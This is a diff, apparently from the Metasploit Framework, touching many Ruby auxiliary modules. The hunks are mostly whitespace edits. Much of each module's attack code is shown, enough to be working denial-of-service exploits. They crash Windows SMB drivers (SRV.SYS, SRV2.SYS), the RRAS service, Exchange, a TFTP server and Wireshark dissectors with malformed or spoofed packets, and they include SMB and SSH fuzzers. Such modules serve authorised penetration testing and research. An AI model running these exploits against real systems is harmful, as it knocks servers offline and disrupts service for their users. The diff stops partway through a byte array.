@ -48,12 +48,12 @@ class Metasploit3 < Msf::Auxiliary
'DefaultAction' => 'Attack',
'DisclosureDate' => 'Jul 11 2006'
))
register_options(
[
OptString.new('MAILSLOT', [ true, "The mailslot name to use", 'Alerter']),
], self.class)
end
# MAILSLOT: HydraLsServer
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
case action.name
when 'Attack'
print_status("Mangling the kernel, two bytes at a time...");
connect
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Exception => e
if (i == 1)
if (i == 1)
print_status("Failed to write any data to the mailslot: #{e}")
break
end
@ -96,8 +96,8 @@ class Metasploit3 < Msf::Auxiliary
# Errors:
# 0xc0000034 = object not found
# 0xc0000205 = insufficient resources (too much data)
# 0xc0000205 = insufficient resources (too much data)
end
disconnect


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft SRV.SYS Pipe Transaction No Null',
'Description' => %q{
This module exploits a NULL pointer dereference flaw in the
SRV.SYS driver of the Windows operating system. This bug was
independently discovered by CORE Security and ISS.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
['BID', '19215'],
]
))
end
def run
@ -52,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary
1.upto(5) do |i|
print_status("Sending bad SMB transaction request #{i}...");
self.simple.client.trans_nonull(
"\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}",
'',
Rex::Text.rand_text_alphanumeric(rand(16)+1),
3,
[1,0,1].pack('vvv'),
"\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}",
'',
Rex::Text.rand_text_alphanumeric(rand(16)+1),
3,
[1,0,1].pack('vvv'),
true
)
end


@ -1,10 +1,21 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',
'Description' => %q{
This module exploits a denial of service vulnerability in the
@ -14,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => [ 'j.v.vallejo[at]gmail.com' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
'References' =>
[
['MSB', 'MS09-001'],
['OSVDB', '48153'],
@ -49,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed
pkt['Payload'].v['ShareAccess'] = 7
pkt['Payload'].v['CreateOptions'] = 0x400040
pkt['Payload'].v['Impersonation'] = 2
pkt['Payload'].v['Impersonation'] = 2
pkt['Payload'].v['Disposition'] = 1
pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
'References' =>
[
['CVE', '2009-3103'],
['BID', '36299'],
@ -41,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary
Opt::RPORT(445),
OptInt.new('OFFSET', [true, 'The function table offset to call', 0xffff])
], self.class)
end
def run
connect()
# The SMB 2 dialect must be there
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
@ -65,13 +65,13 @@ class Metasploit3 < Msf::Auxiliary
print_status("Sending request and waiting for a reply...")
sock.put(pkt.to_s)
r = sock.get_once
if(not r)
print_status("The target system has likely crashed")
else
print_status("Response received: #{r.inspect}")
end
disconnect()
end
@ -95,11 +95,11 @@ end
0x76 = ExAllocatePoolWithTag
0x77 = ExFreePool
0x86 = ExAllocatePoolWithTag
0x87 = ExFreePoo
0x87 = ExFreePoo
0x96 = ExAllocatePoolWithTag
0x97 = ExFreePoo
0x97 = ExFreePoo
0xa6 = ExAllocatePoolWithTag
0xa7 = ExFreePoo
0xa7 = ExFreePoo
0xb9 = BugCheckEx
0xc7 = SrvBalanceCredits
0xdf = SrvNetStatistics data
@ -114,10 +114,10 @@ end
0x0179 = SrvProcessOplockBreakTimer
0x0185 = L"XactSrv"
0x01f8 = WppTraceCallback
Offsets on Vista SP1 (no updates) x86:
0x64 = mov esp, ebp; pop ebp, ret
0xde = pool with tag
@ -154,6 +154,6 @@ end
734 -> 802015ff - ffde03f078f8ff7f7c02f8ff3ffe01fe
760 -> 99b4ff28 - 8bff558bec6a00ff7514ff7510ff750c
804 -> 830ffc7d - 0000001722268b3e012004020010c01c
=end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -22,54 +22,54 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference',
'Description' => %q{
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing
an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing
an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.
Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.
},
'Author' => [ 'sf' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
'References' =>
[
[ 'CVE', '2009-3103'],
[ 'OSVDB', '57799' ],
[ 'MSB', 'MS09-050' ],
]
))
register_options( [ Opt::RPORT( 445 ) ], self.class )
end
def run
print_status( "Targeting host #{datastore['RHOST']}:#{datastore['RPORT']}..." )
connect
dialects = [ "AAAA" + [ 0xDEADC0DE ].pack( "V" ) + [ 0xCAFEF00D ].pack( "V" ), "SMB 2.002" ]
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join( '' )
data += "A" * 128
packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
packet['Payload']['SMB'].v['Flags1'] = 0x18
packet['Payload']['SMB'].v['Flags2'] = 0xC853
packet['Payload']['SMB'].v['ProcessIDHigh'] = Rex::Proto::SMB::Constants::SMB2_OP_LOGOFF
packet['Payload'].v['Payload'] = data
packet = packet.to_s
print_status( "Sending the exploit packet (#{packet.length} bytes)..." )
sock.put( packet )
response = sock.get_once
if( not response )
print_status( "No response. The target system has probably crashed." )
else
print_status( "Response received. The target system is not vulnerable:\n#{response.inspect}" )
end
disconnect
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -21,15 +21,15 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference',
'Description' => %q{
This module triggers a NULL dereference in svchost.exe on
all current versions of Windows that run the RRAS service. This
all current versions of Windows that run the RRAS service. This
service is only accessible without authentication on Windows XP
SP1 (using the SRVSVC pipe).
SP1 (using the SRVSVC pipe).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
@ -44,18 +44,18 @@ class Metasploit3 < Msf::Auxiliary
'DefaultAction' => 'Attack',
'DisclosureDate' => 'Jun 14 2006'
))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
], self.class)
end
def run
connect
smb_login
case action.name
when 'Attack'
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
stb = [0, 0, 0, 0].pack('V*')
print_status("Calling the vulnerable function...")
begin
dcerpc.call(0x0C, stb)
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
raise e
end
end
end
disconnect


@ -1,10 +1,9 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -16,19 +15,19 @@ class Metasploit3 < Msf::Auxiliary
include Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Vista SP0 SMB Negotiate Protocol DoS',
'Description' => %q{
This module exploits a flaw in Windows Vista that allows a remote
unauthenticated attacker to disable the SMB service. This vulnerability
was silently fixed in Microsoft Vista Service Pack 1.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
register_options([Opt::RPORT(445)], self.class)
end
@ -38,11 +37,11 @@ class Metasploit3 < Msf::Auxiliary
# 100 requests ensure that the bug is reliably hit
1.upto(100) do |i|
begin
connect
# 118 dialects are needed to trigger a non-response
dialects = ['NT LM 0.12'] * 118
@ -59,16 +58,16 @@ class Metasploit3 < Msf::Auxiliary
sock.put(pkt.to_s)
disconnect
rescue ::Interrupt
raise $!
rescue ::Exception
print_status("Error at iteration #{i}: #{$!.class} #{$!}")
return
end
end
end
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Smtp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'MS06-019 Exchange MODPROP Heap Overflow',
'Description' => %q{
This module triggers a heap overflow vulnerability in MS
@ -42,23 +42,23 @@ class Metasploit3 < Msf::Auxiliary
[
OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])
], self.class)
end
#
# This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class
#
def run
connect_login
modprops = ['attendee', 'categories', 'class', 'created', 'description',
'dtstamp', 'duration', 'last-modified',
modprops = ['attendee', 'categories', 'class', 'created', 'description',
'dtstamp', 'duration', 'last-modified',
'location', 'organizer', 'priority', 'recurrence-id', 'sequence',
'status', 'summary', 'transp', 'uid']
#modprops = ['dtstamp']
modpropshort = ""
modpropbusted = ""
modnum = rand(3)
@ -79,14 +79,14 @@ class Metasploit3 < Msf::Auxiliary
boundry = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8)
# Really, the randomization above only crashes /sometimes/ - it's MUCH more
# reliable, and gives crashes in better spots of you use these modprops:
modpropshort = "dtstamp,"
modproplong = "dtstamp, dtstamp,"
modpropbusted = "DTSTAMP:\r\n"
mail = "From: #{datastore['MAILFROM']}\r\n"
mail << "To: #{datastore['MAILTO']}\r\n"
mail << "Subject: #{datastore['SUBJECT']}\r\n"
@ -111,12 +111,12 @@ class Metasploit3 < Msf::Auxiliary
mail << "END:VCALENDAR\r\n"
mail << "\r\n--#{boundry}\r\n"
mail << "\r\n.\r\n"
print_status("Sending message...")
print_status("Sending message...")
sock.put(mail)
sock.put("QUIT\r\n")
print "<< " + sock.get_once
print "<< " + sock.get_once
disconnect
end


@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'PacketTrap TFTP Server 2.2.5459.0 DoS',
'Description' => %q{
The PacketTrap TFTP server version 2.2.5459.0 can be


@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -12,9 +16,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Wireshark chunked_encoding_dissector function DOS',
'Description' => %q{
Wireshark crash when dissecting an HTTP chunked response.
@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
],
'DisclosureDate' => 'February 22 2007'))
register_options([
OptInt.new('SPORT', [true, 'The source port used to send the malicious HTTP response', 80]),
OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
@ -50,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
n.l3.protocol = 6
n.l3.id = rand(0x10000)
n.l3.ttl = 64
n.l4 = Racket::L4::TCP.new
n.l4.dst_port = rand(65535)+1
n.l4.seq = rand(0x100000000)
@ -60,11 +64,11 @@ class Metasploit3 < Msf::Auxiliary
n.l4.src_port = datastore['SPORT'].to_i
n.l4.window = 3072
n.l4.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53
\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
pkt = n.pack
capture_sendto(pkt, rhost)
close_pcap


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Wireshark LDAP dissector DOS',
@ -31,13 +31,13 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-1562' ],
],
'DisclosureDate' => 'Mar 28 2008')
'DisclosureDate' => 'Mar 28 2008')
register_options([
OptInt.new('RPORT', [true, 'The destination port', 389]),
OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
], self.class)
deregister_options('FILTER','PCAPFILE')
end
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Sending malformed LDAP packet to #{rhost}")
m = Rex::Text.rand_text_alpha_lower(3)
open_pcap
n = Racket::Racket.new
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
n.l3.protocol = 6
n.l3.id = rand(0x10000)
n.l3.ttl = 64
n.l4 = Racket::L4::TCP.new
n.l4.src_port = rand(65535)+1
n.l4.seq = rand(0x100000000)
@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary
n.l4.window = 3072
n.l4.payload = "0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016"
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
pkt = n.pack
capture_sendto(pkt, rhost)


@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Tree Connect Request Fuzzer',
@ -29,35 +29,35 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$'
))
end
def do_smb_connect(pkt,opts={})
@connected = false
connect
simple.login(
datastore['SMBName'],
datastore['SMBName'],
datastore['SMBUser'],
datastore['SMBPass'],
datastore['SMBDomain']
)
)
@connected = true
simple.connect("\\\\#{datastore['RHOST']}\\#{pkt}")
end
def run
last_str = nil
last_inp = nil
last_err = nil
cnt = 0
fuzz_strings do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
do_smb_connect(str, 0.25)
rescue ::Interrupt
@ -68,16 +68,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end


@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Tree Connect Request Corruption',
@ -32,48 +32,48 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('SMBTREE', [true, 'Specify the tree name to corrupt', "\\\\SERVER\\IPC$"])
], self.class)
end
def do_smb_tree(pkt,opts={})
@connected = false
connect
simple.login(
datastore['SMBName'],
datastore['SMBName'],
datastore['SMBUser'],
datastore['SMBPass'],
datastore['SMBDomain']
)
@connected = true
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
def run
# Connect in order to get the server-assigned user-id
connect
smb_login
pkt = make_smb_tree
disconnect
last_str = nil
last_inp = nil
last_err = nil
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SMB tree connect with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_smb_tree(str, 0.25)
rescue ::Interrupt
@ -84,29 +84,29 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
end
def make_smb_tree
share = datastore['SMBTREE']
pass = ''
data = [ pass, share, '?????' ].collect{ |a| a + "\x00" }.join('');
pkt = Rex::Proto::SMB::Constants::SMB_TREE_CONN_PKT.make_struct
simple.client.smb_defaults(pkt['Payload']['SMB'])
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TREE_CONNECT_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001


@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH Key Exchange Init Corruption',
@ -32,40 +32,40 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
def do_ssh_kexinit(pkt,opts={})
@connected = false
connect
@connected = true
@banner = sock.get_once(-1,opts[:banner_timeout])
return if not @banner
sock.put("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n")
sock.put(pkt)
sock.get_once(-1,opts[:kex_timeout])
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_kex_init
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SSH initial key exchange with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_ssh_kexinit(str,:banner_timeout => 5, :kex_timeout => 0.5)
rescue ::Interrupt
@ -76,16 +76,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
if(not @banner)
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
return
@ -95,106 +95,106 @@ class Metasploit3 < Msf::Auxiliary
last_inp = @last_fuzzer_input
end
end
def make_kex_init
[0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65,
0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,
0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64,
0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,
0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,
0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34,
0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69,
0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c,
0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f,
0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d,
0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d,
0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61,
0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62,
0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63,
0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,
0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,
0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d,
0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66,
0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61,
0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35,
0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,
0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73,
0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c,
0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c,
0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73,
0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75,
0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31,
0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61,
